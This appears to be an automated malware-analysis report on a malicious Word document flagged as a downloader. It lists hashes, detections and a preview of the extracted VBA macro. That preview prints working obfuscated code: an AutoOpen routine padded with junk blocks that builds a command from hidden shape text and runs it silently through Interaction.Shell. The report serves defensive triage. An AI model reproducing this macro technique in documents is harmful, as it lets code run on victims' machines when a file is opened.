Office (OLE) malware analysis — malicious · e8e03a1d179cec3f

MALICIOUS

Office (OLE)

77.2 KB Created: 2018-11-23 05:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 55e8ba1c7c89854e3727e5e04ea9558e SHA-1: 0282dc8b0891d9dc14fb17ec9c1e420273fc910d SHA-256: e8e03a1d179cec3fd9bf6dc4b3b9cef35ef6d68cf0ea936702f8764b9c19a1c0

152 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Sagent-6770337-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-6770337-0
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2833 bytes
SHA-256: `dd7a9197df976d7b6d1e931a0cb02f98de10dadf859172f8b22769db04b40d3d`
Detection ClamAV: No threats found Obfuscation or payload: likely 86 of 139 identifiers look randomly generated (e.g. 'aRhijomXKlQIfr') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aRhijomXKlQIfr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next If JkTvk <= KNvZEu Then Set ODpVS = FdOuZrz jQRjDnhcS = DMCiuaX Set wVEjiqM = dcupu Set lNiwi = AGXmkRRGS Set inXBtdt = ibTBJEhdc End If Set pAwwiXr = Shapes("hXoslCRZmvQ") On Error Resume Next If KLVllihs <= zfELkIJhz Then Set XTqAk = FafwbOw HmrXKwK = MESvIR Set CPAjPzW = LlQfDB Set WijhEwRmX = qFGmhoMoz Set hbfjXlT = mtSGPPhk End If On Error Resume Next If FYufMpbHa <= bJPZP Then Set drcwA = jqIfwF MHFAznF = wPMqv Set MfAKkTip = tnturEX Set tVfOwWIR = KAibPFEY Set KHULmt = cMNEsND End If GnclDIpzza = "" + jdwErE + clcdkZ + vCCJSi + pAwwiXr.TextFrame.TextRange.Text + dfjpr + clbWrEzv On Error Resume Next If DZzmniORO <= HCWvIXrqW Then Set Bjisq = XAkEpF QtfJOE = kRaEV Set qBuXiD = cwUuHvWL Set hKECmF = dOdlN Set kJaWcZ = GNZmToU End If On Error Resume Next If VwfJOQR <= kHOPfikdz Then Set YwqMHLK = uhSHUS MvmSbO = vMUHilO Set SXqzRIhJo = zzVjjc Set vzSmwKXI = AirzcYCDP Set RUBHimzwb = HLfrTm End If On Error Resume Next If EUAWw <= SERJDqnU Then Set DNoOqMi = GvVzzETiw AtahbfwhX = zCJiU Set qSMiEu = ctachUz Set iGAmazWlI = IpasEl Set ijOBSSlG = znBDRN End If On Error Resume Next If QazLXVWLT <= pobOmz Then Set TSLAI = hIQBw JpjAQiFz = KoRsNnBd Set DhjSXJmp = UQDGT Set cKVFoKj = zZJdtHuR Set iczRzqRa = bWkicD End If Interaction.Shell! GnclDIpzza, 0 On Error Resume Next If iXLaizjLJ <= MSaGLNGz Then Set DmMPzMr = nlwCCHKkH mjKoi = PhMMvc Set ATccKSION = zvZNmJKPW Set IUQKO = wAQAi Set Lqvja = zSzqZrK End If On Error Resume Next If rsMiOIWiY <= WhVSUliR Then Set AUkEOiTwf = YaOSF ZitlNj = zEcAIV Set dAqZzdGo = zvMqfANHO Set DuCkjd = ElzmdK Set wZXjpVb = lluqB End If On Error Resume Next If CzvpZJTzt <= dikOTR Then Set KOhWK = hIXTS Qtkpbaok = oZaAMw Set zwNnCDX = zaroOjC Set AKcUspJni = oWpGVzMC Set ZGfmN = NrAiAVj End If On Error Resume Next If mwaYF <= wfVMCt Then Set WfIZT = AGijsi dmHWFY = mJNrS Set MjnRwQwN = cphFarvD Set hunlKX = HdsSMSRGj Set TSQkc = EsJRozwJ End If On Error Resume Next If NwMNOY <= KHItOlRj Then Set wQzlhLhMz = bpcwjZ pnlYsjXj = Qzibw Set LWQnpPkBQ = NwzwiJZUj Set dwYFhcFZv = dXTiiFiw Set PElUYimZ = ZHaOsCSM End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.